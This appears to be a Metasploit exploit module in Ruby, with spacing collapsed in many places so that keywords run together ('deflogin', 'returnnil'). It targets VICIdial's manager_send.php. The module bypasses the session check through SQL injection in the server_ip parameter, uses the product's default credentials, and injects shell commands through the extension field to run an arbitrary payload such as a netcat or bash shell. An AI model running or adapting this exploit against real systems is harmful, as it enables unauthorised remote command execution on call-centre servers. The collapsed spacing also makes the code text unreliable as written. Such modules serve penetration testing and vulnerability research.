|  
 require 'msf/core'
  
 classMetasploit3 < Msf::Exploit::Remote 
   Rank = ExcellentRanking 
  
   include Msf::Exploit::Remote::HttpClient 
  
   definitialize(info = {}) 
     super(update_info(info, 
       'Name'=> 'VICIdial Manager Send OS Command Injection', 
       'Description'=> %q{ 
           The file agc/manager_send.php inthe VICIdial web application uses 
         unsanitized user input as part of a command that is executed using the PHP
         passthru() function. Avalid username, password andsession are needed to access 
         the injection point. Fortunately, VICIdial has two built-inaccounts with default 
         passwords andthe manager_send.php file has a SQLinjection vulnerability that can 
         be used to bypass the session check as long as at least one session has been 
         created at some point intime. In casethere isn't any valid session, the user can 
         provide astGUIcient credentials inorder to create one. The results of the injected 
         command are returned as part of the response from the web server. Affected versions 
         include 2.7RC1, 2.7, and2.8-403a. Other versions are likely affected as well. The 
         default credentials used by Vicidial are VDCL/donotedit andVDAD/donotedit. 
       }, 
       'Author'=> 
         [ 
           'Adam Caudill <adam@adamcaudill.com>', 
           'AverageSecurityGuy <stephen@averagesecurityguy.info>', 
           'sinn3r', 
           'juan vazquez'
         ], 
       'License'=> MSF_LICENSE, 
       'References'=> 
         [ 
           [ 'CVE', '2013-4467'], 
           [ 'CVE', '2013-4468'], 
           [ 'OSVDB', '98903'], 
           [ 'OSVDB', '98902'], 
           [ 'BID', '63340'], 
           [ 'BID', '63288'], 
         ], 
       'DisclosureDate'=> 'Oct 23 2013', 
       'Privileged'=> true, 
       'Platform'=> ['unix'], 
       'Payload'=> 
         { 
           'DisableNops'=> true, 
           'Space'=> 8000, 
           'Compat'=> 
             { 
               'PayloadType'=> 'cmd', 
               
               'RequiredCmd'=> 'generic perl python awk bash telnet nc openssl', 
             } 
         }, 
       'Targets'=> 
         [ 
           [ 'CMD', 
             { 
               'Arch'=> ARCH_CMD, 
               'Platform'=> 'unix'
             } 
           ] 
         ], 
       'DefaultTarget'=> 0
       )) 
  
     register_options( 
       [ 
         OptString.new('USERNAME',              [true, 'VICIdial Username', 'VDCL']), 
         OptString.new('PASSWORD',              [true, 'VICIdial Password', 'donotedit']), 
         OptString.new('USER_ASTGUI',           [false, 'astGUIcient User Login', '6666']), 
         OptString.new('PASS_ASTGUI',           [false, 'astGUIcient User Password', '1234']), 
         OptString.new('PHONE_USER_ASTGUI',     [false, 'astGUIcient Phone Login', '6666']), 
         OptString.new('PHONE_PASSWORD_ASTGUI', [false, 'astGUIcient Phone Password', '1234']) 
       ], self.class) 
   end
  
   
   
   deflogin 
     begin
       res = send_request_cgi({ 
         'uri'=> '/agc/astguiclient.php', 
         'method'=> 'POST', 
         'vars_post'=> { 
          "user"=> datastore["USER_ASTGUI"], 
          "pass"=> datastore["PASS_ASTGUI"], 
          "phone_login"=> datastore["PHONE_USER_ASTGUI"], 
          "phone_pass"=> datastore["PHONE_PASSWORD_ASTGUI"] 
         } 
       }) 
     rescue::Rex::ConnectionError 
       vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") 
       returnnil
     end
  
     returnres 
   end
  
   defastguiclient_creds? 
     ifdatastore["USER_ASTGUI"].nil? ordatastore["USER_ASTGUI"].empty? 
       returnfalse
     end
  
     ifdatastore["PASS_ASTGUI"].nil? ordatastore["PASS_ASTGUI"].empty? 
       returnfalse
     end
  
     ifdatastore["PHONE_USER_ASTGUI"].nil? ordatastore["PHONE_USER_ASTGUI"].empty? 
       returnfalse
     end
  
     ifdatastore["PHONE_PASSWORD_ASTGUI"].nil? ordatastore["PHONE_PASSWORD_ASTGUI"].empty? 
       returnfalse
     end
  
     returntrue
   end
  
   defrequest(cmd, timeout = 20) 
     begin
       res = send_request_cgi({ 
         'uri'=> '/agc/manager_send.php', 
         'method'=> 'GET', 
         'vars_get'=> { 
           "enable_sipsak_messages"=> "1", 
           "allow_sipsak_messages"=> "1", 
           "protocol"=> "sip", 
           "ACTION"=> "OriginateVDRelogin", 
           "session_name"=> rand_text_alpha(12), 
           "server_ip"=> "' OR '1' = '1", 
           "extension"=> ";#{cmd};", 
           "user"=> datastore['USERNAME'], 
           "pass"=> datastore['PASSWORD'] 
         } 
       }, timeout) 
     rescue::Rex::ConnectionError 
       vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") 
       returnnil
     end
  
     returnres 
   end
  
   defcheck 
     res = request('ls -a .') 
  
     ifres andres.code == 200
       ifres.body =~ /Invalid Username\/Password/ 
         vprint_error("#{peer} - Invalid Username or Password.") 
         returnExploit::CheckCode::Detected 
       elsifres.body =~ /Invalid session_name/ 
         vprint_error("#{peer} - Web client session not found") 
         returnExploit::CheckCode::Detected 
       elsifres.body =~ /\.\n\.\.\n/m 
         returnExploit::CheckCode::Vulnerable 
       end
     end
  
     returnExploit::CheckCode::Unknown 
   end
  
   defexploit 
     print_status("#{peer} - Checking if injection is possible...") 
     res = request('ls -a .') 
  
     unlessres andres.code == 200
       fail_with(Failure::Unknown - "#{peer} - Unknown response, check the target") 
     end
  
     ifres.body =~ /Invalid Username\/Password/ 
       fail_with(Failure::NoAccess - "#{peer} - Invalid VICIdial credentials, check USERNAME and PASSWORD") 
     end
  
     ifres.body =~ /Invalid session_name/ 
       fail_with(Failure::NoAccess, "#{peer} - Valid web client session not found, provide astGUI or wait until someone logins") unlessastguiclient_creds? 
       print_error("#{peer} - Valid web client session not found, trying to create one...") 
       res = login 
       unlessres andres.code == 200andres.body =~ /you are logged/ 
         fail_with(Failure::NoAccess, "#{peer} - Invalid astGUIcient credentials, check astGUI credentials or wait until someone login.") 
       end
       res = request('ls -a .') 
     end
  
     unlessres andres.code == 200andres.body =~ /\.\n\.\.\n/m 
       fail_with(Failure::NotVulnerable, "#{peer} - Injection hasn't been possible") 
     end
  
     print_good("#{peer} - Exploitation looks feasible, proceeding... ") 
     request("#{payload.encoded}", 1) 
   end
  
 end
 
 |